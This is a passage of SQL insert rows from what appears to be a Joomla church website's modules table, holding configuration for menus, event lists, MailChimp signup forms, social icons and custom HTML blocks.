(361, 323, 'Tabs module', '', '', 1, 'innerbottom-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_roksprocket', 1, 1, '{\"run_content_plugins\":\"onmodule\",\"provider\":\"joomla\",\"layout\":\"tabs\",\"joomla_articles\":{\"1\":{\"root\":{\"article\":\"85\"}},\"2\":{\"root\":{\"article\":\"86\"}},\"3\":{\"root\":{\"article\":\"87\"}}},\"joomla_sort\":\"manual\",\"joomla_sort_manual_append\":\"after\",\"tabs_themes\":\"default\",\"display_limit\":\"\\u221e\",\"tabs_position\":\"top\",\"tabs_animation\":\"slideandfade\",\"tabs_autoplay\":\"0\",\"tabs_autoplay_delay\":\"5\",\"tabs_resize_enable\":\"0\",\"tabs_resize_width\":\"0\",\"tabs_resize_height\":\"0\",\"tabs_previews_length\":\"0\",\"tabs_strip_html_tags\":\"0\",\"tabs_title_default\":\"title\",\"tabs_icon_default\":\"none\",\"tabs_icon_default_custom\":\"\",\"tabs_link_default\":\"primary\",\"tabs_link_default_custom\":\"\",\"tabs_description_default\":\"primary\",\"cache\":\"0\",\"moduleclass_sfx\":\"\",\"module_cache\":\"1\",\"cache_time\":\"900\"}', 0, '*'),
(362, 311, 'Vertical Menu', '', '', 1, 'sidebar-a', 0, '0000-00-00 00:00:00', '2016-12-19 16:09:01', '0000-00-00 00:00:00', 1, 'mod_menu', 1, 1, '{\"menutype\":\"vertical-menu\",\"base\":\"\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"colored\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(363, 221, 'Vertical Menu', '', '', 7, 'sidebar-b', 0, '0000-00-00 00:00:00', '2017-08-12 15:23:40', '0000-00-00 00:00:00', -2, 'mod_menu', 1, 1, '{\"menutype\":\"vertical-menu\",\"base\":\"\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"colored\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(364, 288, 'Welcome to Lighthouse', '', '<p><img class=\"hidden-img\" src=\"images/demo/blog.png\" alt=\"Lighthouse\" height=\"128\" width=\"128\" /></p>', 1, 'showcase', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(365, 192, 'Upcoming Events', '', '', 6, 'sidebar-b', 0, '0000-00-00 00:00:00', '2017-08-12 15:23:40', '0000-00-00 00:00:00', -2, 'mod_jevents_latest', 1, 1, '{\"com_calViewName\":\"ext\",\"cache\":\"1\",\"contentplugins\":\"1\",\"moduleclass_sfx\":\"\",\"catidnew\":[\"30\"],\"ignorecatfilter\":\"0\",\"ignorefiltermodule\":\"0\",\"target_itemid\":\"\",\"modlatest_inccss\":\"1\",\"layout\":\"\",\"modlatest_useLocalParam\":\"1\",\"showNavigation\":\"1\",\"modlatest_CustFmtStr\":\"<span class=\\\"icon-calendar\\\"><\\/span>${startDate(%d %b %Y)}[!a:<br\\/><span class=\\\"icon-time\\\"><\\/span>${startDate(%I:%M%p)} - ${endDate(%I:%M%p)}]\\r\\n<span class=\\\"icon-hand-right\\\"><\\/span><strong>${title}<\\/strong>\",\"modlatest_customcss\":\"\",\"modlatest_MaxEvents\":\"5\",\"modlatest_Mode\":\"5\",\"modlatest_Days\":\"2\",\"startnow\":\"1\",\"pastonly\":\"0\",\"modlatest_NoRepeat\":\"1\",\"modlatest_multiday\":\"0\",\"modlatest_DispLinks\":\"0\",\"modlatest_DispYear\":\"0\",\"modlatest_NoEvents\":\"0\",\"modlatest_DisDateStyle\":\"0\",\"modlatest_DisTitleStyle\":\"1\",\"modlatest_LinkToCal\":\"0\",\"modlatest_LinkCloaking\":\"0\",\"modlatest_SortReverse\":\"0\",\"modlatest_RSS\":\"0\",\"modlatest_rss_title\":\"\",\"modlatest_rss_description\":\"\",\"modlatest_templatetop\":\"\",\"modlatest_templaterow\":\"\",\"modlatest_templatebottom\":\"\",\"bootstrapcss\":\"1\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(376, 211, 'Join our mailing list', '', '<div class=\"news-mockup\">\r\n<p class=\"newsletter-intro\">Drop us your email address and get up to date with our upcoming events and latest news from us</p>\r\n<p><span class=\"acyfield_email\"><input id=\"user_email_form\" class=\"inputbox\" style=\"width: 240px;\" name=\"user[email]\" type=\"text\" value=\"Your email address\" /></span></p>\r\n<p class=\"acysubbuttons align-right\"><a class=\"newsletter-btn button-color\" href=\"#\">Subscribe</a></p>\r\n<span class=\"acymailing_finaltext\"><img class=\"pic3d-dark uk-align-left\" src=\"images/demo/blog/blog-mini-3.png\" alt=\"Lighthouse\" width=\"64\" height=\"64\" /> We promise not to share your email with anyone except you. We won\'t promise not to email you at least once. <br /><br /><a class=\"button-color right\" href=\"#\">See our policy</a></span></div>', 1, 'bottom-c', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(382, 0, 'K2 Quick Icons (admin)', '', '', 0, 'icon', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_k2_quickicons', 1, 1, '', 1, '*'),
(383, 0, 'K2 Stats (admin)', '', '', 0, 'cpanel', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_k2_stats', 1, 1, '', 1, '*'),
(385, 201, 'Blog', '', '', 1, 'showcase', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(386, 200, 'Blog Category', '', '', 2, 'sidebar-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_k2_tools', 1, 1, '{\"moduleclass_sfx\":\"\",\"module_usage\":\"4\",\"archiveItemsCounter\":\"1\",\"archiveCategory\":\"0\",\"authors_module_category\":\"0\",\"authorItemsCounter\":\"1\",\"authorAvatar\":\"1\",\"authorAvatarWidthSelect\":\"custom\",\"authorAvatarWidth\":\"50\",\"authorLatestItem\":\"1\",\"calendarCategory\":\"0\",\"home\":\"\",\"seperator\":\"\",\"root_id\":\"0\",\"end_level\":\"\",\"categoriesListOrdering\":\"\",\"categoriesListItemsCounter\":\"1\",\"root_id2\":\"0\",\"catfilter\":\"0\",\"getChildren\":\"0\",\"liveSearch\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"\",\"imagebutton\":\"\",\"button_text\":\"\",\"searchItemId\":\"\",\"min_size\":\"75\",\"max_size\":\"300\",\"cloud_limit\":\"30\",\"cloud_category\":[\"0\"],\"cloud_category_recursive\":\"0\",\"customCode\":\"\",\"parsePhp\":\"0\",\"K2Plugins\":\"0\",\"JPlugins\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(387, 204, 'Comments', '', '', 3, 'sidebar-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_k2_comments', 1, 1, '{\"moduleclass_sfx\":\"\",\"module_usage\":\"0\",\"catfilter\":\"0\",\"comments_limit\":\"2\",\"comments_word_limit\":\"10\",\"commenterName\":\"1\",\"commentAvatar\":\"1\",\"commentAvatarWidthSelect\":\"custom\",\"commentAvatarWidth\":\"40\",\"commentDate\":\"0\",\"commentDateFormat\":\"relative\",\"commentLink\":\"1\",\"itemTitle\":\"1\",\"itemCategory\":\"0\",\"feed\":\"0\",\"commenters_limit\":\"5\",\"commenterNameOrUsername\":\"1\",\"commenterAvatar\":\"1\",\"commenterAvatarWidthSelect\":\"custom\",\"commenterAvatarWidth\":\"50\",\"commenterLink\":\"1\",\"commenterCommentsCounter\":\"1\",\"commenterLatestComment\":\"1\",\"cache\":\"1\",\"cache_time\":\"900\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(388, 203, 'Tags', '', '', 4, 'sidebar-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_k2_tools', 1, 1, '{\"moduleclass_sfx\":\"\",\"module_usage\":\"7\",\"archiveItemsCounter\":\"1\",\"archiveCategory\":\"0\",\"authors_module_category\":\"0\",\"authorItemsCounter\":\"1\",\"authorAvatar\":\"1\",\"authorAvatarWidthSelect\":\"custom\",\"authorAvatarWidth\":\"50\",\"authorLatestItem\":\"1\",\"calendarCategory\":\"0\",\"home\":\"\",\"seperator\":\"\",\"root_id\":\"0\",\"end_level\":\"\",\"categoriesListOrdering\":\"\",\"categoriesListItemsCounter\":\"1\",\"root_id2\":\"0\",\"catfilter\":\"0\",\"getChildren\":\"0\",\"liveSearch\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"\",\"imagebutton\":\"\",\"button_text\":\"\",\"searchItemId\":\"\",\"min_size\":\"100\",\"max_size\":\"100\",\"cloud_limit\":\"30\",\"cloud_category\":[\"0\"],\"cloud_category_recursive\":\"0\",\"customCode\":\"\",\"parsePhp\":\"0\",\"K2Plugins\":\"0\",\"JPlugins\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(389, 202, 'Calendar', '', '', 5, 'sidebar-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_k2_tools', 1, 1, '{\"moduleclass_sfx\":\"\",\"module_usage\":\"2\",\"archiveItemsCounter\":\"1\",\"archiveCategory\":\"0\",\"authors_module_category\":\"0\",\"authorItemsCounter\":\"1\",\"authorAvatar\":\"1\",\"authorAvatarWidthSelect\":\"custom\",\"authorAvatarWidth\":\"50\",\"authorLatestItem\":\"1\",\"calendarCategory\":\"0\",\"home\":\"\",\"seperator\":\"\",\"root_id\":\"0\",\"end_level\":\"\",\"categoriesListOrdering\":\"\",\"categoriesListItemsCounter\":\"1\",\"root_id2\":\"0\",\"catfilter\":\"0\",\"getChildren\":\"0\",\"liveSearch\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"\",\"imagebutton\":\"\",\"button_text\":\"\",\"searchItemId\":\"\",\"min_size\":\"75\",\"max_size\":\"300\",\"cloud_limit\":\"30\",\"cloud_category\":[\"0\"],\"cloud_category_recursive\":\"0\",\"customCode\":\"\",\"parsePhp\":\"0\",\"K2Plugins\":\"0\",\"JPlugins\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(391, 281, 'Banner position', '', '', 1, 'banner', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_banners', 1, 0, '{\"target\":\"1\",\"count\":\"5\",\"cid\":\"1\",\"catid\":[\"\"],\"tag_search\":\"0\",\"ordering\":\"0\",\"header_text\":\"\",\"footer_text\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(395, 0, 'Client Testimonials', '', '', 1, 'bottom-a', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 'mod_widgetkit', 1, 1, '{\"widget_id\":\"22\",\"moduleclass_sfx\":\"\"}', 0, '*'),
(399, 188, 'Tag Cloud', '', '', 10, 'sidebar-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_k2_tools', 1, 1, '{\"moduleclass_sfx\":\"\",\"module_usage\":\"7\",\"archiveItemsCounter\":\"1\",\"archiveCategory\":\"0\",\"authors_module_category\":\"0\",\"authorItemsCounter\":\"1\",\"authorAvatar\":\"1\",\"authorAvatarWidthSelect\":\"custom\",\"authorAvatarWidth\":\"50\",\"authorLatestItem\":\"1\",\"calendarCategory\":\"0\",\"home\":\"\",\"seperator\":\"\",\"root_id\":\"0\",\"end_level\":\"\",\"categoriesListOrdering\":\"\",\"categoriesListItemsCounter\":\"1\",\"root_id2\":\"0\",\"catfilter\":\"0\",\"getChildren\":\"0\",\"liveSearch\":\"\",\"width\":\"20\",\"text\":\"\",\"button\":\"\",\"imagebutton\":\"\",\"button_text\":\"\",\"min_size\":\"100\",\"max_size\":\"100\",\"cloud_limit\":\"30\",\"cloud_category\":[\"0\"],\"cloud_category_recursive\":\"0\",\"customCode\":\"\",\"parsePhp\":\"0\",\"K2Plugins\":\"0\",\"JPlugins\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(400, 189, 'Mega Menu', '', '', 1, 'mega-menu', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_icemegamenu', 1, 1, '{\"theme_style\":\"\",\"vertical_direction\":\"left\",\"menutype\":\"mainmenu\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"resizable_menu\":\"1\",\"class_sfx\":\"\",\"window_open\":\"\",\"tag_id\":\"\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"30\",\"enable_bootrap\":\"0\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(401, 199, 'Module', '', '<p>\r\n  Our themes are built on a responsive framework, which gives them a <a href=\"#\">friendly, adaptive layout</a>\r\n</p>', 1, '', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(402, 206, 'Offcanvas menu', '', '', 1, 'offcanvas', 0, '0000-00-00 00:00:00', '2016-11-01 13:03:44', '0000-00-00 00:00:00', 1, 'mod_menu', 1, 0, '{\"menutype\":\"mainmenu\",\"base\":\"\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"1\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"canvas-menu\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(403, 255, 'Popular Tags', '', '', 1, 'sidebar-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_tags_popular', 1, 1, '{\"maximum\":\"5\",\"timeframe\":\"alltime\",\"order_value\":\"count\",\"order_direction\":\"1\",\"display_count\":0,\"no_results_text\":\"0\",\"minsize\":1,\"maxsize\":2,\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"owncache\":\"1\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(404, 264, 'Social Icons', '', '<p>[icon_button icon=\"icon-facebook\" url=\"https://www.facebook.com/ReverendAreogun/\" target=\"_blank\"][/icon_button] [icon_button icon=\"icon-twitter\" url=\"https://www.twitter.com/ReverendAreogun/\" target=\"_blank\"][/icon_button]</p>', 3, 'bottom-d', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(405, 265, 'Social Icons', '', '<p><span style=\"font-size: 12.16px;\">[icon_button icon=\"icon-facebook\" url=\"https://www.facebook.com/ReverendAreogun/\" target=\"_blank\"][/icon_button] [icon_button icon=\"icon-twitter\" url=\"https://www.twitter.com/ReverendAreogun/\" target=\"_blank\"][/icon_button]</span></p>', 1, 'toolbar-r', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_custom', 1, 1, '{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(406, 271, 'Sidebar B', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 14, 'sidebar-b', 196, '2017-08-12 15:22:07', '2017-08-12 15:22:41', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(407, 272, 'Sidebar B', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 8, 'sidebar-b', 196, '2017-08-12 15:21:16', '2017-08-12 15:21:43', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(408, 280, 'Sidebar A', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 7, 'sidebar-a', 196, '2017-08-12 15:20:33', '2017-08-12 15:20:58', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(410, 284, 'Sidebar A', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 5, 'sidebar-a', 196, '2017-08-12 15:20:30', '2017-08-12 15:20:58', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(411, 285, 'Sidebar B', '', '<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>', 14, 'sidebar-b', 196, '2017-08-12 15:22:09', '2017-08-12 15:22:41', '0000-00-00 00:00:00', -2, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(412, 301, 'About Us', '', '', 1, 'showcase', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 'mod_custom', 1, 1, '{\"prepare_content\":\"1\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(413, 308, 'Logo', '', '<img class=\"img-retina\" src=\"/images/demo/logo5.png\" alt=\"alt-icon\" width=\"230\" height=\"80\" />', 1, 'logo', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 'mod_custom', 1, 1, '{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(414, 319, 'Jumi', '', '', 0, '', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 'mod_jumi', 1, 1, '', 0, '*'),
(415, 322, 'Live Streaming', '', '', 2, 'sidebar-b', 196, '2019-08-13 14:39:48', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_menu', 1, 1, '{\"menutype\":\"live-streaming\",\"base\":\"\",\"startLevel\":1,\"endLevel\":0,\"showAllChildren\":1,\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"colored\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"itemid\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(416, 326, 'Live Chat', '', '<p>{jumi[*5]}</p>', 1, 'sidebar-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 'mod_custom', 1, 1, '{\"prepare_content\":0,\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(421, 346, 'Home Side Banner', '', '<p><a title=\"GOBC 2018 Reigstraiton\" href=\"gobc2018/\" target=\"_blank\" rel=\"noopener noreferrer\"><img src=\"images/gobc-sidebar.png\" alt=\"\" width=\"582\" height=\"304\" /></a></p>\r\n<p> </p>\r\n<p> </p>', 1, 'sidebar-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 0, 'mod_custom', 1, 0, '{\"prepare_content\":\"0\",\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(422, 349, 'Upcoming Events (copy)', '', '', 6, 'sidebar-b', 0, '0000-00-00 00:00:00', '2017-08-12 15:23:40', '0000-00-00 00:00:00', -2, 'mod_jevents_latest', 1, 1, '{\"com_calViewName\":\"global\",\"cache\":\"0\",\"contentplugins\":\"0\",\"moduleclass_sfx\":\"\",\"catidnew\":[\"38\"],\"ignorecatfilter\":\"0\",\"ignorefiltermodule\":\"0\",\"target_itemid\":\"\",\"modlatest_inccss\":\"0\",\"layout\":\"\",\"modlatest_useLocalParam\":\"1\",\"showNavigation\":\"0\",\"modlatest_CustFmtStr\":\"<div><p class=\\\"event-time\\\"> ${eventDate(j)}:${eventDate(M)}<\\/p>${title}\\r\\n${extraInfo}<\\/div>\",\"modlatest_customcss\":\"\",\"modlatest_MaxEvents\":\"3\",\"modlatest_Mode\":\"3\",\"modlatest_Days\":\"365\",\"startnow\":\"1\",\"pastonly\":\"2\",\"modlatest_NoRepeat\":\"1\",\"modlatest_multiday\":\"0\",\"modlatest_DispLinks\":\"1\",\"modlatest_DispYear\":\"0\",\"modlatest_NoEvents\":\"1\",\"modlatest_DisDateStyle\":\"0\",\"modlatest_DisTitleStyle\":\"1\",\"modlatest_LinkToCal\":\"0\",\"modlatest_LinkCloaking\":\"0\",\"modlatest_SortReverse\":\"0\",\"modlatest_RSS\":\"0\",\"modlatest_rss_title\":\"\",\"modlatest_rss_description\":\"\",\"modlatest_templatetop\":\"\",\"modlatest_templaterow\":\"\",\"modlatest_templatebottom\":\"\",\"bootstrapcss\":\"1\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(423, 352, 'Join Our Mailing List', '', '', 1, 'bottom-c', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_mailchimpsignup', 1, 1, '{\"intro-text\":\"Subscribe to our Mailing List. Get daily Spirit Meat Devotional Guide\",\"outro-text-1\":\"\",\"outro-text-2\":\"\",\"thankyou\":\"Thank you! Please check your email and confirm the newsletter subscription.\",\"updateMsg\":\"You were already subscribed to this list. Your settings have been updated. Thank you!\",\"listid\":\"cb9600c42e\",\"fields\":[\"EMAIL;email;Email Address;1;\",\"FNAME;text;First Name;0;\",\"LNAME;text;Last Name;0;\"],\"email-type\":\"html\",\"dateFormat\":\"%Y-%m-%d\",\"phoneFormat\":\"inter\",\"address2\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
(424, 353, 'MailChimp Stats', '', '', -1, 'cpanel', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_mailchimpstats', 1, 1, '', 1, '*'),
(425, 354, 'Join Our Mailing List', '', '', 1, 'sidebar-b', 0, '0000-00-00 00:00:00', '0000-00-00 00:00:00', '0000-00-00 00:00:00', 1, 'mod_mailchimpsignup', 1, 1, '{\"intro-text\":\"Subscribe to our Mailing List. Get daily Spirit Meat Devotional Guide\",\"outro-text-1\":\"\",\"outro-text-2\":\"\",\"thankyou\":\"Thank you! Please check your email and confirm the newsletter subscription.\",\"updateMsg\":\"You were already subscribed to this list. Your settings have been updated. Thank you!\",\"listid\":\"cb9600c42e\",\"fields\":[\"EMAIL;email;Email Address;1;\",\"FNAME;text;First Name;0;\",\"LNAME;text;Last Name;0;\"],\"email-type\":\"html\",\"dateFormat\":\"%Y-%m-%d\",\"phoneFormat\":\"inter\",\"address2\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}', 0, '*'),
